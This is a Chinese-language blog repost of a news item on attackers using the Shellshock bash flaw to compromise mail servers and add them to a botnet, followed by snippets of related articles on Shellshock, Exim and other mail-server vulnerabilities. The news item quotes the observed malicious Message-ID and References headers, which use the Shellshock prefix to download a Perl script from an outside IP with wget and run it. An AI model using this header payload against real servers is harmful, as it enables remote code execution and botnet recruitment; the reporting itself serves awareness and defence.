攻击者利用 Shellshock 漏洞入侵邮件服务器

最新推荐文章于 2022-08-02 15:15:25 发布
转载 最新推荐文章于 2022-08-02 15:15:25 发布 · 291 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/110950
文章标签:

#操作系统

攻击者利用Shellshock漏洞入侵邮件服务器,通过发送特殊构造的消息头字段,诱骗服务器执行恶意Perl脚本,进而将其纳入僵尸网络。此过程揭示了针对Unix/Linux系统的潜在威胁。

攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求,诱骗bash远程执行命令。安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是:

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

文章转载自 开源中国社区 [http://www.oschina.net]
Wget漏洞(CVE-2016-4971)利用方式解析
qq_40907977的博客
05-15 1860
漏洞描述 近日, CVE-2016-4971漏洞被正式披露,该漏洞影响全部旧版本wget, 黑客可以利用漏洞对程序员和运维工程师进行钓鱼,从而获得其主机权限或者植入rootkit。 漏洞详情 wget 作为*nix 系统常用下载工具,支持http、https、ftp 等多种协议,当使用wget 下载文件时,若初始下载http服务提供的下载资源, 如果服务器将下载资源重定向到ftp服务时,wget 会默认信赖http服务器重定向的ftp 链接地址和文件名,而不做二次验证。从而可能下载到恶意钓鱼者的恶意文件,
邮件服务器漏洞攻击,Exim邮件服务中的严重漏洞分析
weixin_33461476的博客
07-31 1098
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。一、摘要在对Exim邮件服务器的最新更改进行代码审查期间(https://en.wikipedia.org/wiki/Exim),我们发现了一个RCE漏洞,版本4.87至4.91(含)。在这种特殊情况下,RCE表示远程*命令*执行,而不是远程执行代码:攻击者可以以root身份执行ex...
SEED实验系列:ShellShock 攻击实验
weixin_33897722的博客
04-21 762
2019独角兽企业重金招聘Python工程师标准>>> ...
来了!攻击者利用Shellshock漏洞入侵邮件服务器
weixin_33888907的博客
05-02 189
来了!攻击者利用Shellshock漏洞入侵邮件服务器 攻击者利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。 安全研究人员报告,攻击者邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是: Shellshock spam October 2014 (IP地址已隐藏...
教务邮箱遭入侵引发邮件服务器安全思考
weixin_34099526的博客
12-10 695
2019独角兽企业重金招聘Python工程师标准>>> ...
黑客入侵美国司法部的电子邮件服务器
w3cschools的博客
01-08 762
近日,美国司法部周三承认其内部网络是SolarWinds(网络安全管理软件产品)供应链攻击的一部分。美国司法部发言人马克·赖蒙迪说:“司法部首席信息官办公室(OCIO)获悉了以前与全球SolarWinds事件有关的未知黑客恶意活动,该事件已影响到多个联邦机构和技术承包商。此活动涉及对美国商务部Microsoft Office 365电子邮件环境的访问。” 美国司法部称这是“重大事件”,称通过SolarWinds软件在网络上进行监视的黑客可能访问了司法部电子邮件帐户的大约3%,但没有迹象表明他们访问了机
Linux 《ShellShock 攻击实验》实验报告
Yohann丶blog
08-02 323
image.png 介绍 wiki: Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。 环境搭建 下载 $ sudo su $ wg...
Bash漏洞——Shellshock浅析.pdf
07-10
最常见和推荐的解决方案是安装官方发布的安全补丁,这可以有效地阻止攻击者利用漏洞。此外,保持系统和软件的及时更新,以及定期进行安全审计和漏洞扫描,也是防止类似漏洞的关键措施。 Shellshock的出现提醒我们...
Bash漏洞-Shellshock浅析.pdf
07-10
报告指出,包括雅虎和WinZip在内的知名公司服务器都曾因Shellshock漏洞遭受入侵。 **Bash漏洞的防治** 修复Shellshock漏洞的关键是更新到不受影响的Bash版本。对于4.3之前的Bash版本,都需要进行升级。此外,还可以...
ShellShock(破壳漏洞)的简单分析
热门推荐
爱唠叨的老鱼
09-27 1万+
(1)什么是ShellShock? (2)ShellShock漏洞的原理。 (3)ShellShock漏洞的危害。 (4)如何修复ShellShock漏洞
网络漏洞扫描与漏洞利用技术
# 1. 网络漏洞概述 网络漏洞指的是在计算机网络中存在的安全漏洞,这些漏洞可能会被黑客利用,导致网络系统的安全性受到威胁。...攻击者可以利用漏洞入侵系统,造成数据泄露、数据损毁、系统瘫痪以及非法利益获取等
TLS漏洞:超过50万个电子邮件服务器容易受黑客攻击,太可怕了
weixin_30472035的博客
09-08 506
2019年在流行的开源Exim电子邮件服务器软件中发现了一个关键的远程执行代码漏洞,至少有超过50万个电子邮件服务器容易受到远程黑客攻击。Exim是一种广泛使用的开源邮件传输代理(MTA)软件,为类似Unix的操作系统(如Linux,Mac OSX或Solaris)开发,目前运行着近60%的互联网电子邮件服务器,用于路由,传递和接收电子邮件。 Exim官网今日公布版本...
邮件服务器元传出重大漏洞 目前已出现攻击程序
weixin_34106122的博客
06-14 418
近60%的服务器邮件服务器组件Exim已经通过了一个主要漏洞,允许黑客以最高权限执行任意命令。经过一周的发现,研究人员发现至少有两个群体发动了攻击,包括Linux Servo。用户特别关注他们的目标。 Exim是一种开源邮件传输代理(Mail Tansfer Agent,MTA),广泛用于全球邮件服务器。据统计,目前全球约占57%,超过50万台邮件服务器使用Exim,有些甚至估计有370万台。在...
环境变量相关的shellshock攻击
qq_43674956的博客
01-12 677
环境变量 什么是环境变量 环境变量是存储在进程中的一系列动态键值对,它们可以影响进程的行为。 可以通过局部变量envp获取,只能在main函数中使用 也可以用environ全局变量获取 也可以调用getenv(var_name)来获取 这个函数是在environ数组中搜索 也可以使用putenv(),setenv()和unsetenv()来改变修改和删除环境变量 进程获取环境变量的方式 使用fork()子进程继承父进程的所有环境变量 使用execve()第一个参数是新程序的路径 第二个参数是数组传入新程序的
UMail邮件服务器竖铜墙铁壁有效阻止垃圾邮件入侵
weixin_33860722的博客
07-26 516
为什么80%的码农都做不了架构师?>>> ...
了解Linux服务器攻击手法
互联网
01-11 344
随着Linux企业应用的扩展,有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列出,并提出不同的解决方案。   对Linux服务器攻击的定义是:攻击是一种旨在妨碍、损害、削弱、破坏Linux服务器安全的未授权行为。攻击的范围可以从服务拒绝直至完全危害和破坏Linux服务器。对Linux服务器攻击有许多...
轻松应对邮件服务器攻击的办法
iteye_3807的博客
07-19 983
入侵邮件服务器的攻击形式多种多样:有利用缓冲区溢出漏洞进行的攻击,还有拒绝服务攻击和目录收集攻击等等。加固邮件服务器、使用邮件过滤工具、采用被管理的服务、安装集成软件等措施都可以从不同的侧面终止邮件服务器所受到的攻击。本文对上述这些措施都有具体描述。   加固邮件服务器,首先在它前面安装邮件过滤网络工具,或者使用被管理的邮件过滤服务将有助于减轻来自垃圾邮件发送者和其它途径的攻击。   ...
看黑客是如何攻击电子邮件的
红杉树(ecitnet)的博客
10-16 1806
出自邮件系统的漏洞   毫无疑问,电子邮件是当今世界上使用最频繁的商务通信工具,据可靠统计显示,目前全球每天的电子邮件发送量已超过500亿条,预计到2008年该数字将增长一倍。  在不断公布的漏洞通报中,邮件系统的漏洞该算最普遍的一项。  黑客常常利用电子邮件系统的漏洞,结合简单的工具就能达到攻击目的。  电子邮件究竟有哪些潜在的风险?黑客在邮件上到底都做了哪些手脚?  一同走
命令注入_开源邮件服务器 OpenSMTPD 被曝命令注入漏洞
weixin_30359265的博客
12-31 476
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队本周,开源邮件服务器 OpenSMTPD 发布更新,解决了一个界外读取漏洞,导致任意代码执行后果。OpenSMTPD 是 OpenBSD 中简单邮件传输协议 (SMTP) 的开源实现,其可移植版本能够在多种 Linux 发行版本以及苹果 Mac OS X 平台上运行。该漏洞的编号是 CVE-2020-8794,存在于自2015年...
shellshock漏洞利用
最新发布
04-03
2. 执行任意命令:一旦成功利用Shellshock漏洞攻击者可以执行任意的命令。这可能包括获取敏感信息、修改系统配置、植入后门等。 为了防止Shellshock漏洞利用,以下是一些建议的防御措施: 1. 及时更新:及时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值